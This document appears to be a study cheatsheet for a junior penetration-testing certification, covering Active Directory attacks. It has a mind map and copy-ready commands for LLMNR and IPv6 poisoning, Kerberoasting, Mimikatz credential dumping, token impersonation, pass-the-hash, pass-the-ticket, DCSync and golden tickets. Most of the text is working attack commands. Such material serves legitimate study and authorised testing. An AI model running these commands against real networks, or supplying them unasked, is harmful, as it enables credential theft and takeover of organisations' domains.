# Techniques Mind Map

```mermaid
mindmap
  root((PJPT))
    Initial Access
      LLMNR Poisoning
        responder -I eth0
      IPv6 Attacks
        mitm6 -d domain
      SMB Relay
        ntlmrelayx.py
      Password Spraying
        crackmapexec smb
    Quick Wins
      Kerberoasting
        GetUserSPNs.py
        hashcat -m 13100
      GPP Passwords
        Get-GPPPassword
      Token Impersonation
        load incognito
      BloodHound
        SharpHound.exe
    Credential Dumping
      Mimikatz
        sekurlsa::logonpasswords
        lsadump::sam
      NTDS.dit
        secretsdump.py
        ntdsutil
    Lateral Movement
      Pass-the-Hash
        psexec.py -hashes
        evil-winrm -H
      Pass-the-Ticket
        getTGT.py
        kerberos::ptt
      RDP/WinRM
        xfreerdp
        Enter-PSSession
    Domain Admin
      DCSync
        lsadump::dcsync
      Golden Ticket
        kerberos::golden
    Persistence
      Backdoor accounts
      Scheduled tasks
```

## Quick Commands Cheatsheet
### Start Here

```bash
# Terminal 1 - LLMNR
sudo responder -I eth0 -wrf
# Terminal 2 - IPv6
sudo mitm6 -d domain.local
# Terminal 3 - Check targets
crackmapexec smb 10.0.0.0/24
```

### Must Do After Credentials
```
# Kerberoasting (ALWAYS!)
GetUserSPNs.py domain/user:pass -request -dc-ip DC_IP
# BloodHound collection
bloodhound-python -d domain -u user -p pass -c all
# Check for GPP (run on a Windows host)
Get-GPPPassword
findstr /S cpassword \\dc\sysvol\*.xml
```

### After Local Admin
```
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
# Token impersonation (Meterpreter)
load incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator
```

### Lateral Movement
```bash
# Pass-the-Hash
psexec.py -hashes :NTLM domain/administrator@target
# Pass-the-Ticket
getTGT.py domain/user:pass
export KRB5CCNAME=user.ccache
psexec.py -k -no-pass domain/administrator@target
```

## Links to Detailed Guides
| Technique | File | Description |
|-----------|------|-------------|
| Mimikatz | mimikatz-overview.md | Credential dumping |
**Pro Tip:** Start with passive attacks (responder/mitm6) and ALWAYS try Kerberoasting after getting any valid credentials!